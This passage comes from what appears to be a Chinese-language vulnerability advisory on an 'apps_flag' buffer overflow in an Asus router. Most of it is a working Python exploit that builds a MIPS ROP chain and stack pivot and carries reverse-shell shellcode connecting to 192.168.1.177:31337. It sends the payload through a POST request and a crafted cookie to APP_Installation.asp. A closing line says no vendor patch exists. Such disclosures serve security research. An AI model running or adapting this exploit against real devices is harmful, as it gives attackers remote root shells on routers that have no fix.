flag' 参数缓冲区溢出漏洞(3)

#sched_yield()
    sch_yield_s0 = struct.pack("<L", libcBaseAddr + 0x94b0)
   
    #Stage 1 Shellcode
    jalr_sp =  "\x09\xf8\xa0\x03"

#Stage 2 Shellcode (Stack Pivot) by Jacob Holcomb of ISE
    stg2_SC = "\x2c\x08\xbd\x27"# addiu sp, sp, 2092
    stg2_SC += "\x09\xf8\xa0\x03"# jalr sp
    stg2_SC += "\x32\x41\x61"#filler for link (branch delay)

#Stage 3 Shellcode
    #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE
    #Connects on 192.168.1.177:31337
    stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01"

payload =  junk + sch_yield_s0 + junk[0:12] + saved_ra1 + junk[0:32]
    payload += saved_ra2 + junk[0:36] + saved_ra3 + junk[0:24] + jalr_sp
    payload += link_nop + saved_ra4 + junk[0:4] + stg2_SC
    postData = "apps_action=install&apps_path=&apps_name=%s&apps_flag=sdb1" % payload

try:
        print "\n [*] Preparing the malicious web request."
        httpRequest = urllib2.Request("%s/APP_Installation.asp" % target, data = postData)
        httpRequest.add_header("Cookie", "hwaddr=" + junk[0:35] + stg3_SC + "\x42" * (265 - len(stg3_SC)))
        if auth != 0:
            httpRequest.add_header("Authorization", "Basic %s" % auth)
        print " [*] Successfully built HTTP POST request."

except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

try:
        print """ [*] Preparing to send Evil PAYLoAd to %s on port %d!\n [*] Payload Length: %d
[*] Waiting...""" % (host, port, len(payload))
        sploit = urllib2.urlopen(httpRequest, None, 6)
        if sploit.getcode() == 200:
            print " [*] Server Response: HTTP 200 OK. Get ready 2 catch roOt on TCP/31337!"
        else:
            print " [*] Server Response: HTTP %d. Something went wrong!" % sploit.getcode()

except(urllib2.URLError) as error:
        print "\n [!!!] Web request error! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    finally:
        print " [*] %s exploit code has finished.\n" % finger

if __name__ == "__main__":
    main()

建议：
--------------------------------------------------------------------------------
厂商补丁：

Asus
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：